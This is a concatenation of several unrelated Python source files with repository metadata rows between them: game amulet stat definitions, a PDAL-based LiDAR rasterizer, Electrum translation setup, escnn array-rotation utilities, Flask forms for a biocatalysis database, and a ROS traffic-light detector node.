a = [('prep',100)]
Choco = The_Chocolatiers
class Worthy_Rivals(Amulet):
att = 64
a = [('bk',0.30),
('prep',25)]
class Lord_of_the_Skies(Amulet):
att = 46
a = [('od',0.10)]
class Witchs_Kitchen(Amulet):
att = 57
a = [('s',0.40,'hp100'),
('resist',50,'blind')]
class Silke_Lends_a_Hand(Amulet):
att = 42
a = [('s',0.20),
('resist',50,'blind')]
class Saintly_Delivery(Amulet):
att = 42
a = [('s',0.20),
('resist',50,'stun')]
class Luck_of_the_Draw(Amulet):
att = 33
a = [('resist',25,'paralysis'), ('bt',0.25,'shadow')]
class Lunar_Festivities(Amulet):
att = 51
a = [('fs',0.40),
('sp',0.10,'fs')]
class The_Warrioresses(Amulet):
att = 52
a = [('fs',0.40),
('cd',0.13)]
class Stellar_Show(Amulet):
att = 65
a = [('fs',0.50),
('cd',0.15)]
SS = Stellar_Show
class Kung_Fu_Masters(Amulet):
att = 64
a = [('s',0.20), ('cc',0.14,'axe')]
KFM = Kung_Fu_Masters
class Forest_Bonds(Amulet):
att = 64
a = [('sp',0.12,'fs'), ('s',0.40,'bow')]
FB = Forest_Bonds
class Dragon_and_Tamer(Amulet):
att = 57
a = [('s',0.40, 'lance')]
DnT = Dragon_and_Tamer
class Twinfold_Bonds(Amulet):
att = 65
a = [('a',0.15,'hit15'), ('s',0.40,'dagger')]
TB = Twinfold_Bonds
class Summer_Paladyns(Amulet):
att = 64
a = [('s',0.40, 'axe'), ('bc_energy', 1)]
class The_Shining_Overlord(Amulet):
att = 65
a = [('dc', 3), ('s',0.40,'sword')]
TSO = The_Shining_Overlord
class Halidom_Grooms(Amulet):
att = 50
a = [('bt',0.2), ('bc_energy', 1)]
HG = Halidom_Grooms
class Beach_Battle(Amulet):
att = 50
a = [('bt',0.2), ('sp',0.07,'water')]
BB = Beach_Battle
class The_Petal_Queen(Amulet):
att = 53
a = [('eprep', 5)]
class Hanetsuki_Rally(Amulet):
att = 51
a = [('cc',0.05),('lo',0.4)]
HR = Hanetsuki_Rally
class Indelible_Summer(Amulet):
att = 52
a = [('sp',0.09,'water')]
IS = Indelible_Summer
class Sisters_Day_Out(Amulet):
att = 64
a = [('fs',0.40), ('fsprep', 3, 0.25)]
SDO = Sisters_Day_Out
class Elegant_Escort(Amulet):
att = 54
a = [('k_burn',0.3)]
EE = Elegant_Escort
class Beautiful_Nothingness(Amulet):
att = 52
a = [('a',0.10,'hp70'),('cc',0.05)]
BN = Beautiful_Nothingness
class Castle_Cheer_Corps(Amulet):
att = 64
a = [('sp',0.06), ('fsprep', 3, 0.25)]
CCC = Castle_Cheer_Corps
class Honest_Repose(Amulet):
att = 53
a = [('sp', 10, 'flame')]
class High_Dragon_WP(Amulet):
att = 39
class Taiko_Tandem(Amulet):
att = 50
a = [('ecombo', 30), ('prep', 0.20)]
class Candy_Couriers(Amulet):
att = 65
a = [('bk',0.25), ('s',0.40,'wand')]
CC = Candy_Couriers
class From_Whence_He_Comes(Amulet):
att = 50
a = [('bt',0.2),
('prep',0.25)]
FWHC = From_Whence_He_Comes
class Dear_Diary(Amulet):
att = 65
a = [('ro', 0.10), ('cc',0.14,'bow')]
DD = Dear_Diary
class Dear_Diary_RO_30(Amulet):
att = 65
a = [('ro', 0.1, 30), ('cc',0.14,'bow')]
class Dear_Diary_RO_60(Amulet):
att = 65
a = [('ro', 0.1, 60), ('cc',0.14,'bow')]
class Dear_Diary_RO_90(Amulet):
att = 65
a = [('ro', 0.1, 90), ('cc',0.14,'bow')]
class Odd_Sparrows(Amulet):
att = 51
a = [('bc',0.8)]
OS = Odd_Sparrows
class Mega_Friends(Amulet):
att = 55
a = [('s',0.3),('fs',0.40)]
MF = Mega_Friends
class Wily_Warriors_Flash_and_Heat(Amulet):
att = 53
a = [('sp',0.08),('sp',0.12,'fs')]
WWFH = Wily_Warriors_Flash_and_Heat
class Wily_Warriors_Bubble_and_Wood(Amulet):
att = 54
a = [('a', 0.13, 'hp70')]
class Wily_Warriors_Air_and_Crash(Amulet):
att = 49
a = [('a', 0.2, 'hit15')]
class Howling_to_the_Heavens(Amulet):
att = 65
a = [('cd',0.20), ('cc',0.12,'shadow_hit15')]
HttH = Howling_to_the_Heavens
class Spirit_of_the_Season(Amulet):
att = 65
a = [('a',0.15,'hp100'),('k_paralysis',0.2)]
SotS = Spirit_of_the_Season
class The_Wyrmclan_Duo(Amulet):
att = 65
a = [('s',0.30),
('cd',0.17,'hp70')]
TWD = The_Wyrmclan_Duo
class A_New_Years_Battle(Amulet):
att = 52
a = [('a',0.08,'hp70'),('cc',0.10, 'hit15')]
ANYB = A_New_Years_Battle
class A_Game_of_Cat_and_Boar(Amulet):
att = 33
a = [('bt', 0.25,'light')]
AGoCaB = A_Game_of_Cat_and_Boar
class The_Plaguebringer(Amulet):
att = 50
a = [('k_poison',0.25)]
TP = The_Plaguebringer
class A_Dogs_Day(Amulet):
att = 62
a = [('bt',0.25,'wind'), ('sp',0.1,'wind')]
ADD = A_Dogs_Day
class The_Bridal_Dragon(Amulet):
att = 64
a = [('dp',10),('da',0.18)]
TBD = The_Bridal_Dragon
class A_Suit_of_Midnight(Amulet):
att = 52
a = [('dp',10), ('ag', 3)]
class Primal_Crisis(Amulet):
att = 55
a = [('a', 0.20, 'hit15'), ('cc', 0.10, 'hit15')]
PC = Primal_Crisis
class Felyne_Hospitality(Amulet):
att = 65
a = [('cc', 0.10, 'hp70'), ('bc_crit_damage', 0.15)]
FH = Felyne_Hospitality
class Unexpected_Requests(Amulet):
att = 65
a = [('lo', 0.50), ('lo_crit_chance', 0.30)]
class The_Lurker_in_the_Woods(Amulet):
att = 65
a = [('fs', 0.50), ('bk', 0.25)]
class Prayers_Unto_Him(Amulet):
att = 64
a = [('da', 0.18), ('dt', 0.15)]
class An_Ancient_Oath(Amulet):
att = 65
a = [('da', 0.18), ('dc', 4)]
class The_Fires_of_Hate(Amulet):
att = 65
a = [('k_poison', 0.2), ('a', 0.15, 'hp100')]
class The_Queen_of_the_Knife(Amulet):
att = 52
a = [('cd', 0.13), ('cc', 0.1, 'hit15')]
class Breakfast_at_Valerios(Amulet):
att = 65
a = [('cc', 0.08, 'hp70'), ('a', 0.2, 'hit15')]
class Brothers_in_Arms(Amulet):
att = 65
a = [('bc',0.13), ('bk', 0.25)]
class A_Small_Courage(Amulet):
att = 52
a = [('bc',0.08), ('a', 0.13, 'hp100')]
class The_Red_Impulse(Amulet):
att = 65
a = [('dcs', 3), ('dc', 3)]
class Proper_Maintenance(Amulet):
att = 64
a = [('a', 0.15, 'hp100'),('bt',0.20)]
class His_Clever_Brother(Amulet):
att = 51
a = [('k_frostbite',0.20),('sp',0.05)]
class Memory_of_a_Friend(Amulet):
att = 64
a = [('sp', 0.08), ('a', 0.2, 'hit15')]
class Me_and_My_Bestie(Amulet):
att = 64
a = [('k_burn', 0.30), ('bc_energy', 1)]
class Blossoms_on_the_Waters_Edge(Amulet):
att = 62
a = [('dh', 0.08), ('dp', 0.10)]
class Memories_of_Summers_Dusk(Amulet):
att = 65
a = [('k_stun', 0.2), ('k_paralysis', 0.2)]
class A_Passion_for_Produce(Amulet):
att = 52
a = [('s',0.20), ('cc',0.12)]
| 19.287257
| 62
| 0.568085
|
794b08bd43b98762ba6562865cd0c6ec0fa51309
| 5,882
|
py
|
Python
|
src/surfclass/rasterize.py
|
plimkilde/surfclass
|
0534d6400f0e3636150079ac3bb2cf676f472233
|
[
"MIT"
] | 3
|
2019-10-30T10:05:58.000Z
|
2019-11-08T12:41:33.000Z
|
src/surfclass/rasterize.py
|
plimkilde/surfclass
|
0534d6400f0e3636150079ac3bb2cf676f472233
|
[
"MIT"
] | 17
|
2019-10-25T12:57:34.000Z
|
2019-12-17T08:12:36.000Z
|
src/surfclass/rasterize.py
|
plimkilde/surfclass
|
0534d6400f0e3636150079ac3bb2cf676f472233
|
[
"MIT"
] | 2
|
2019-12-18T15:22:09.000Z
|
2019-12-18T15:39:27.000Z
|
"""Tools for rasterization of LiDAR files."""
import json
import logging
from pathlib import Path
import pdal
from surfclass import lidar, rasterio, Bbox
logger = logging.getLogger(__name__)
dimension_nodata = {
"Z": -999,
"Intensity": 0,
"ReturnNumber": 0,
"NumberOfReturns": 0,
"Classification": 255,
"ScanAngleRank": -999,
"Pulse width": -999,
"Amplitude": -999,
"PointSourceId": 0,
}
class LidarRasterizer:
"""Rasterizes one or more dimensions from one or more LiDAR files.
The underlying LiDAR library is PDAL, so dimension names used must be compatible with PDAL.
Note:
For the time being the following filters are hard coded into this class:
- Ground points only (classification == 2)
- "Pulse width" < 2.55
"""
def __init__(
self,
lidarfiles,
outdir,
resolution,
bbox,
dimensions,
srs,
prefix=None,
postfix=None,
):
"""Inits LidarRasterizer.
Args:
lidarfiles (list of str): List of paths to LiDAR files.
outdir (str): Path to output directory.
resolution (float): Cell size in coordinate system unit.
bbox (Bbox): Bounding box of output raster.
dimensions (list of str): List of LiDAR dimensions to rasterize.
srs (osgeo.osr.SpatialReference): Spatial reference system for the LiDAR files.
prefix (str, optional): Output file(s) prefix. Defaults to None.
postfix (str, optional): Output file(s) postfix. Defaults to None.
"""
self.lidarfiles = (
[lidarfiles] if isinstance(lidarfiles, (str, Path)) else list(lidarfiles)
)
self.outdir = outdir or ""
self.fileprefix = prefix or ""
self.filepostfix = postfix or ""
self.resolution = resolution
self.bbox = Bbox(*bbox)
self.dimensions = self._validate_dimensions(dimensions)
self.pipeline = self._create_pipeline()
self.srs = srs
logger.debug(
"LidarRasterizer init. Outdir: '%s'. Prefix: '%s'. Postfix: '%s' "
"Resolution: %s. Bbox: %s. Dimensions: %s. Files: %s. Pdal pipeline: [%s]",
self.outdir,
self.fileprefix,
self.filepostfix,
self.resolution,
self.bbox,
self.dimensions,
self.lidarfiles,
self.pipeline,
)
def start(self):
"""Starts the processing.
Note:
For the time being the following filters are hard coded into this class:
- Ground points only (classification == 2)
- "Pulse width" < 2.55
Raises:
Exception: If the PDAL pipeline built is not valid.
"""
# Convert the pipeline to stringified JSON (required by PDAL)
pipeline_json = json.dumps(self.pipeline)
pipeline = pdal.Pipeline(pipeline_json)
if pipeline.validate():
pipeline.loglevel = 8 # really noisy
pipeline.execute()
else:
logger.error("Pipeline not valid")
raise Exception("Pipeline not valid.")
logger.debug("Reading data")
data = pipeline.arrays
logger.debug("Data read: %s", data)
# For now just assume one array
points = data[0]
# For now get rid of PulseWidth==2.55
logger.warning("Dropping returns with pulsewidth >= 2.55")
points = points[points[:]["Pulse width"] < 2.55]
sampler = lidar.GridSampler(points, self.bbox, self.resolution)
origin = (self.bbox.xmin, self.bbox.ymax)
for dim in self.dimensions:
logger.debug("Gridding: %s", dim)
nodata = dimension_nodata[dim]
outfile = self._output_filename(dim)
grid = sampler.make_grid(dim, nodata, masked=False)
rasterio.write_to_file(
outfile, grid, origin, self.resolution, self.srs, nodata=nodata
)
def _create_pipeline(self):
# The "merge" filter is not strictly necessary according to https://pdal.io/stages/filters.merge.html#filters-merge
# but lets be explicit about it
pipeline = list(self.lidarfiles)
merge = {"type": "filters.merge"}
pipeline.append(merge)
logger.warning("Filtering away everything but ground")
rangefilter = {
"type": "filters.range",
"limits": "Classification[2:2]", # Ground classification
}
pipeline.append(rangefilter)
# xmin and ymax are inclusive, xmax and ymin are inclusive. Otherwise out gridsampler crashes
xmin, ymin, xmax, ymax = self.bbox
boundsfilter = {
"type": "filters.crop",
"bounds": f"([{xmin}, {xmax - 0.00001}], [{ymin + 0.00001}, {ymax}])",
}
pipeline.append(boundsfilter)
# Build the pipeline by concating the reader, filter and writers
return {"pipeline": pipeline}
def _output_filename(self, dimension):
dimname = dimension.replace(" ", "")
name = f"{self.fileprefix}{dimname}{self.filepostfix}.tif"
return str(Path(self.outdir) / name)
@classmethod
def _validate_dimensions(cls, dimensions):
"""Validates the dimensions given, against PDAL."""
try:
for dim in dimensions:
if not (
any(
pdaldim["name"] == dim
for pdaldim in pdal.dimension.getDimensions()
)
or dim == "Pulse width"
):
raise ValueError(dim, "Dimension not recognized by PDAL")
return dimensions
except ValueError as e:
print("ValueError: ", e)
| 33.804598
| 123
| 0.577355
|
794b0a475094ca12714e0bbe39a682e0449cad3d
| 2,327
|
py
|
Python
|
lib/i18n.py
|
BTCPrivate/electrum-bitcoinprivate
|
d18dbd83353d006136bc986e143e19dbb954c36a
|
[
"MIT"
] | 1
|
2021-04-02T20:35:15.000Z
|
2021-04-02T20:35:15.000Z
|
lib/i18n.py
|
ArdeshirV/electrum-bitcoinprivate
|
d18dbd83353d006136bc986e143e19dbb954c36a
|
[
"MIT"
] | null | null | null |
lib/i18n.py
|
ArdeshirV/electrum-bitcoinprivate
|
d18dbd83353d006136bc986e143e19dbb954c36a
|
[
"MIT"
] | 1
|
2021-04-06T18:34:31.000Z
|
2021-04-06T18:34:31.000Z
|
#!/usr/bin/env python
#
# Electrum - lightweight bitcoinprivate client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import gettext, os
LOCALE_DIR = os.path.join(os.path.dirname(__file__), 'locale')
language = gettext.translation('electrum', LOCALE_DIR, fallback = True)
def _(x):
global language
return language.gettext(x)
def set_language(x):
global language
if x: language = gettext.translation('electrum', LOCALE_DIR, fallback = True, languages=[x])
languages = {
'':_('Default'),
'ar_SA':_('Arabic'),
'cs_CZ':_('Czech'),
'da_DK':_('Danish'),
'de_DE':_('German'),
'eo_UY':_('Esperanto'),
'el_GR':_('Greek'),
'en_UK':_('English'),
'es_ES':_('Spanish'),
'fr_FR':_('French'),
'hu_HU':_('Hungarian'),
'hy_AM':_('Armenian'),
'id_ID':_('Indonesian'),
'it_IT':_('Italian'),
'ja_JP':_('Japanese'),
'ky_KG':_('Kyrgyz'),
'lv_LV':_('Latvian'),
'nl_NL':_('Dutch'),
'no_NO':_('Norwegian'),
'pl_PL':_('Polish'),
'pt_BR':_('Brasilian'),
'pt_PT':_('Portuguese'),
'ro_RO':_('Romanian'),
'ru_RU':_('Russian'),
'sk_SK':_('Slovak'),
'sl_SI':_('Slovenian'),
'ta_IN':_('Tamil'),
'th_TH':_('Thai'),
'vi_VN':_('Vietnamese'),
'zh_CN':_('Chinese')
}
| 32.774648
| 96
| 0.672969
|
794b0b35918b4e5d4f1e8539762032034ed4a539
| 3,545
|
py
|
Python
|
escnn/gspaces/utils.py
|
QUVA-Lab/escnn
|
59ed6b96f61f8616f87b3f25aa2f8abdb6f1a882
|
[
"BSD-3-Clause"
] | 4
|
2022-03-16T22:51:39.000Z
|
2022-03-18T18:45:49.000Z
|
escnn/gspaces/utils.py
|
QUVA-Lab/escnn
|
59ed6b96f61f8616f87b3f25aa2f8abdb6f1a882
|
[
"BSD-3-Clause"
] | null | null | null |
escnn/gspaces/utils.py
|
QUVA-Lab/escnn
|
59ed6b96f61f8616f87b3f25aa2f8abdb6f1a882
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
from scipy.ndimage import rotate
from scipy.ndimage import affine_transform
def rotate_array_2d(x, angle):
k = 2 * angle / np.pi
if k.is_integer():
# Rotations by 180 and 270 degrees seem to be not perfect using `ndimage.rotate` and can therefore
# make some tests fail.
# For this reason, we use `np.rot90` to perform rotations by multiples of 90 degrees without interpolation
return np.rot90(x, k, axes=(-2, -1))
else:
return rotate(x, angle * 180.0 / np.pi, (-2, -1), reshape=False, order=2)
def linear_transform_array_3d(x, trafo: np.ndarray, exact=True, order=2):
assert trafo.shape == (3, 3)
assert len(x.shape) > 2
return linear_transform_array_nd(x, trafo, exact, order=order)
def linear_transform_array_nd(x, trafo: np.ndarray, exact=True, order=2):
n = trafo.shape[0]
assert trafo.shape == (n, n)
assert len(x.shape) >= n
# TODO : MAKE THIS EXPLICIT SOMEWHERE IN THE DOCS!!!
# assume trafo matrix has [X, Y, Z, ....] order
# but input tensor has [..., -Z, -Y, X] order
trafo = trafo[::-1, ::-1].copy()
trafo[:-1, :] *= -1
trafo[:, :-1] *= -1
D = len(x.shape)
at = np.abs(trafo)
if exact and (
np.isclose(at.sum(axis=0), 1).all() and
np.isclose(at.sum(axis=1), 1).all() and
(np.isclose(at, 1.) | np.isclose(at, 0.)).all()
):
# if it is a permutation matrix we can perform this transformation without interpolation
axs = np.around(trafo).astype(np.int) @ np.arange(1, n+1).reshape(n, 1)
axs = axs.reshape(-1)
stride = np.sign(axs).tolist()
axs = np.abs(axs).tolist()
axs = list(range(D - n)) + [D - n - 1 + a for a in axs]
assert len(axs) == D, (len(axs), D)
y = x.transpose(axs)
stride = (Ellipsis,) + tuple([slice(None, None, s) for s in stride])
y = y[stride]
return y
else:
trafo = trafo.T
t = np.eye(D)
t[-n:, -n:] = trafo
center = np.zeros(len(x.shape))
center[-n:] = (np.asarray(x.shape[-n:]) - 1) / 2
center[-n:] = -(trafo - np.eye(n)) @ center[-n:]
return affine_transform(x, t, offset=center, order=order)
if __name__ == '__main__':
# test that the exact rotation method produces the same results as the interpolation one
# on all 48 origin-preserving isometries of the voxel grid
import itertools
x = np.random.randn(15, 15, 15)
for p in itertools.permutations([0,1,2]):
M = np.eye(3)[p, :]
for s in itertools.product([-1, 1], repeat=3):
rot = np.asarray(s).reshape(-1, 1) * M
y1 = linear_transform_array_3d(x, rot, True)
y2 = linear_transform_array_3d(x, rot, False, order=2)
y3 = linear_transform_array_3d(x, rot, False, order=3)
assert np.allclose(y2, y1), rot
assert np.allclose(y3, y1), rot
# test that the nd method is equivalent to the 2d one
x = np.random.randn(3, 2, 11, 11)
np.set_printoptions(suppress=True, precision=3, linewidth=100000)
for _ in range(10):
angle = np.random.rand()*2*np.pi
rot = np.asarray([
[np.cos(angle), -np.sin(angle)],
[np.sin(angle), np.cos(angle)],
])
y1 = rotate_array_2d(x, angle)
y2 = linear_transform_array_nd(x, rot)
assert np.allclose(y2, y1), rot
| 33.443396
| 114
| 0.56756
|
794b0b711ed618c2169ef3d94b0beddbfce9a024
| 1,349
|
py
|
Python
|
retrobiocat_web/app/biocatdb/model_forms.py
|
ihayhurst/RetroBioCat
|
d674897459c0ab65faad5ed3017c55cf51bcc020
|
[
"MIT"
] | 9
|
2020-12-01T16:33:02.000Z
|
2022-01-19T20:02:42.000Z
|
retrobiocat_web/app/biocatdb/model_forms.py
|
ihayhurst/RetroBioCat
|
d674897459c0ab65faad5ed3017c55cf51bcc020
|
[
"MIT"
] | 4
|
2020-10-02T14:38:32.000Z
|
2021-08-02T09:23:58.000Z
|
retrobiocat_web/app/biocatdb/model_forms.py
|
ihayhurst/RetroBioCat
|
d674897459c0ab65faad5ed3017c55cf51bcc020
|
[
"MIT"
] | 6
|
2021-01-14T07:48:36.000Z
|
2022-03-20T17:34:27.000Z
|
from flask_wtf import FlaskForm
from wtforms import StringField, SelectField, TextAreaField, SubmitField, BooleanField, DateField
from wtforms.validators import DataRequired, NumberRange, ValidationError, Length
from retrobiocat_web.mongo.models.biocatdb_models import EnzymeType, Sequence, Paper
def is_doi_taken(form, field):
for obj in Paper.objects():
if field.data == obj.doi:
raise ValidationError(f'{field.data} is already in the database')
def is_type_taken(form, field):
for obj in EnzymeType.objects():
if field.data == obj.enzyme_type:
raise ValidationError(f'{field.data} is already an enzyme type in the database')
class PaperInfo(FlaskForm):
short_cit = StringField(validators=[DataRequired()])
doi = StringField(validators=[DataRequired(), is_doi_taken])
journal = StringField()
date = DateField(validators=[DataRequired()])
title = StringField()
authors = StringField()
self_assign = BooleanField(default=False)
tags = StringField()
submit = SubmitField('Save')
class EnzymeTypeForm(FlaskForm):
enzyme_type = StringField(validators=[DataRequired(), Length(max=120), is_type_taken])
full_name = StringField()
other_abbreviations = StringField()
description = TextAreaField(validators=[Length(max=255)])
submit = SubmitField()
| 40.878788
| 97
| 0.733877
|
794b0c29f51a2da6fe2ef871768027ca7da18c0b
| 11,980
|
py
|
Python
|
ros/src/tl_detector/tl_detector.py
|
mjanddy/CarND-Capstone-master
|
d25dcfee64387b187c7c407a5ca6b3003808ffde
|
[
"MIT"
] | null | null | null |
ros/src/tl_detector/tl_detector.py
|
mjanddy/CarND-Capstone-master
|
d25dcfee64387b187c7c407a5ca6b3003808ffde
|
[
"MIT"
] | 1
|
2018-07-27T13:34:39.000Z
|
2018-07-27T13:34:39.000Z
|
ros/src/tl_detector/tl_detector.py
|
wzyanqi/CarND-Capstone
|
92827cd8bc28c53c9d778b23ffa84199885d98cb
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import rospy
import numpy as np
from std_msgs.msg import Int32
from geometry_msgs.msg import PoseStamped, Pose
from styx_msgs.msg import TrafficLightArray, TrafficLight
from styx_msgs.msg import Lane
from sensor_msgs.msg import Image
from cv_bridge import CvBridge
from light_classification.tl_classifier import TLClassifier
import tf
import cv2
import yaml
from scipy.spatial import KDTree
import os
STATE_COUNT_THRESHOLD = 4
class TLDetector(object):
def __init__(self):
rospy.init_node('tl_detector')
self.pose = None
self.waypoints = None
self.waypoints_2d = None
self.waypoint_tree = None
self.stateCount = 0
self.image_count = 0
self.state = TrafficLight.RED
self.last_state = TrafficLight.UNKNOWN
self.last_wp = -1
self.state_count = 0
self.camera_image = None
self.lights = []
self.saveImgs = True
if self.saveImgs:
if not (os.path.exists("./saveImgs")):
os.mkdir("./saveImgs")
self.saveCount= 0
config_string = rospy.get_param("/traffic_light_config")
#config_string2 = config_string
#rospy.loginfo("+++++++++++++++Using simulator+++++++++++++++%s",config_string)
self.config = yaml.load(config_string)
#rospy.loginfo("+++++++++++++++Using simulator+++++++++++++++%s",self.config)
isSite = bool(rospy.get_param("~is_siteP", True))
if isSite:
self.usingSimulator = False
rospy.loginfo("+++++++++++++++Using simulator+++++++++++++++")
else:
self.usingSimulator = True
rospy.loginfo("+++++++++++++++Using simulator+++++++++++++++")
self.usingSystemLightState = 0
#self.usingSimulator = 0 if self.config['is_site'] else 1
#self.usingSimulator = bool(rospy.get_param("~is_siteP", False))
self.bridge = CvBridge()
self.light_classifier = TLClassifier(self.usingSimulator)
self.listener = tf.TransformListener()
self.stop_closest_waypoint = []
sub1 = rospy.Subscriber('/current_pose', PoseStamped, self.pose_cb)
sub2 = rospy.Subscriber('/base_waypoints', Lane, self.waypoints_cb)
'''
/vehicle/traffic_lights provides you with the location of the traffic light in 3D map space and
helps you acquire an accurate ground truth data source for the traffic light
classifier by sending the current color state of all traffic lights in the
simulator. When testing on the vehicle, the color state will not be available. You'll need to
rely on the position of the light and the camera image to predict it.
'''
sub3 = rospy.Subscriber('/vehicle/traffic_lights', TrafficLightArray, self.traffic_cb)
#sub6 = rospy.Subscriber('/image_color', Image, self.image_cb)
sub6 = rospy.Subscriber('/image_color', Image, self.image_cb,queue_size=1, buff_size=2*52428800)
self.upcoming_red_light_pub = rospy.Publisher('/traffic_waypoint', Int32, queue_size=1)
self.lastTime = rospy.get_time()
rate = rospy.Rate(200)
while not rospy.is_shutdown():
if self.pose and self.waypoints and self.lights:
#get closest waypoint
#closest_waypoint_idx = self.get_closest_waypoint_idx()
#rospy.loginfo('closest_waypoint_index:%s', closest_waypoint_idx)
#self.publish_waypoints(closest_waypoint_idx)
self.InitializeImage = True
light_wp, state = self.process_traffic_lights()
self.find_traffic_lights(light_wp, state)
rospy.loginfo("=============finish initialize image===========")
self.InitializeImage = False
break
rate.sleep()
rospy.spin()
def pose_cb(self, msg):
self.pose = msg
def waypoints_cb(self, waypoints):
self.waypoints = waypoints
if not self.waypoints_2d:
self.waypoints_2d = [[waypoint.pose.pose.position.x, waypoint.pose.pose.position.y] for waypoint in waypoints.waypoints]
self.waypoint_tree = KDTree(self.waypoints_2d)
def traffic_cb(self, msg):
self.lights = msg.lights
def image_cb(self, msg):
"""Identifies red lights in the incoming camera image and publishes the index
of the waypoint closest to the red light's stop line to /traffic_waypoint
Args:
msg (Image): image from car-mounted camera
"""
self.has_image = True
ThisTime = rospy.get_time()
#rospy.loginfo("Time elapsed:%s",ThisTime - self.lastTime)
self.lastTime = ThisTime
self.image_count = self.image_count + 1
THRESHOLD_SAMPLE = 1
#if self.usingSimulator:
#THRESHOLD_SAMPLE = 1
if (self.image_count >= THRESHOLD_SAMPLE):
self.lastTime = rospy.get_time()
self.image_count = 0
self.has_image = True
self.camera_image = msg
light_wp, state = self.process_traffic_lights()
if (state != 0)and self.saveImgs:
iimage = self.bridge.imgmsg_to_cv2(self.camera_image, "rgb8")
h,w,_ = iimage.shape
#rospy.loginfo("image width:%s height:%s state:%s",w,h,state)
if self.usingSimulator:
iimage = iimage[0:int(0.7*h),0:w]
else:
iimage = iimage[0:int(0.7*h),50:int(w-50)]
self.saveImags(iimage, state)
ThisTime = rospy.get_time()
#rospy.loginfo("Time elapsed:%s, light state:%s",ThisTime - self.lastTime,state)
self.find_traffic_lights(light_wp, state)
def saveImags(self, image, state):
dictTL = {0:"R",1:"Y",2:"G",4:"U"}
takeImage = image
if not self.usingSimulator:
lsImageName ="./saveImgs/image0{0:0>5}.jpg".format(self.saveCount)
#rospy.loginfo("save image:%s",lsImageName)
cv2.imwrite(lsImageName, takeImage)
else:
lsImageName ="./saveImgs/{0}_image6{1:0>5}.jpg".format(dictTL[state],self.saveCount)
rospy.loginfo("save image:%s",lsImageName)
cv2.imwrite(lsImageName, takeImage)
self.saveCount += 1
def find_traffic_lights(self,light_wp, state):
'''
Publish upcoming red lights at camera frequency.
Each predicted state has to occur `STATE_COUNT_THRESHOLD` number
of times till we start using it. Otherwise the previous stable state is
used.
'''
if state == TrafficLight.YELLOW:
state = TrafficLight.RED
if self.InitializeImage:
self.last_wp = light_wp
self.upcoming_red_light_pub.publish(Int32(light_wp))
return
if self.state != state:
self.state_count = 0
self.state = state
elif self.state_count >= STATE_COUNT_THRESHOLD:
self.last_state = self.state
light_wp = light_wp if state == TrafficLight.RED else -1
self.last_wp = light_wp
rospy.loginfo("---light changed,wp is:%s state:%s s state:%s",light_wp,state,self.state)
self.upcoming_red_light_pub.publish(Int32(light_wp))
else:
rospy.loginfo("---light remained,wp is:%s state:%s s state:%s",self.last_wp,state,self.state)
self.upcoming_red_light_pub.publish(Int32(self.last_wp))
self.state_count += 1
def get_closest_waypoint(self, x,y):
"""Identifies the closest path waypoint to the given position
https://en.wikipedia.org/wiki/Closest_pair_of_points_problem
Args:
pose (Pose): position to match a waypoint to
Returns:
int: index of the closest waypoint in self.waypoints
"""
#TODO implement
closest_idx = self.waypoint_tree.query([x,y],1)[1]
# check if the closest is ahed or behind the vehicle
closest_coord = self.waypoints_2d[closest_idx]
prev_coord = self.waypoints_2d[closest_idx - 1]
closest_v = np.array(closest_coord)
prev_v = np.array(prev_coord)
pos_v = np.array([x, y] )
val = np.dot(closest_v - prev_v, pos_v - closest_v)
if val > 0:
closest_idx = (closest_idx + 1) % len(self.waypoints_2d)
return closest_idx
def get_light_state(self, light):
"""Determines the current color of the traffic light
Args:
light (TrafficLight): light to classify
Returns:
int: ID of traffic light color (specified in styx_msgs/TrafficLight)
"""
if self.usingSystemLightState > 0:
if (self.stateCount > 2):
#rospy.loginfo("light state:{0}".format(light.state))
self.stateCount = 0
self.stateCount = self.stateCount + 1
return light.state
cv_image = self.bridge.imgmsg_to_cv2(self.camera_image, "rgb8")
#cv_image = cv2.cvtColor(cv_image, cv2.COLOR_BGR2RGB)
#narrow down seaching area of the image
h,w,_ = cv_image.shape
if self.usingSimulator:
cv_image = cv_image[0:int(0.7*h),0:w]
else:
cv_image = cv_image[0:int(0.7*h),0:w]
#Get classification
return self.light_classifier.get_classification(cv_image)
def process_traffic_lights(self):
"""Finds closest visible traffic light, if one exists, and determines its
location and color
Returns:
int: index of waypoint closes to the upcoming stop line for a traffic light (-1 if none exists)
int: ID of traffic light color (specified in styx_msgs/TrafficLight)
"""
light = None
light_wp = None
# List of positions that correspond to the line to stop in front of for a given intersection
stop_line_positions = self.config['stop_line_positions']
if (self.pose):
car_position = self.get_closest_waypoint(self.pose.pose.position.x,self.pose.pose.position.y)
#TODO find the closest visible traffic light (if one exists)
diff = 200
#for fast get
if len(self.stop_closest_waypoint) == 0:
for i, lightP in enumerate(self.lights):
line = stop_line_positions[i]
self.stop_closest_waypoint.append(self.get_closest_waypoint(line[0] , line[1]))
#rospy.loginfo("len of waypoints:%s car wp:%s",diff,car_position)
for i, lightP in enumerate(self.lights):
tmp_waypoint_idx = self.stop_closest_waypoint[i]
d = tmp_waypoint_idx - car_position
if d>=0 and d< diff:
diff = d
light = lightP
light_wp = tmp_waypoint_idx
if light:
rospy.loginfo("car pos:%s closest light idx %s diff:%s" ,car_position,light_wp, diff)
if self.InitializeImage:
#for first image latency
state = 0
else:
state = self.get_light_state(light)
return light_wp, state
#self.waypoints = None
return -1, TrafficLight.UNKNOWN
if __name__ == '__main__':
try:
TLDetector()
except rospy.ROSInterruptException:
rospy.logerr('Could not start traffic node.')
| 36.413374
| 132
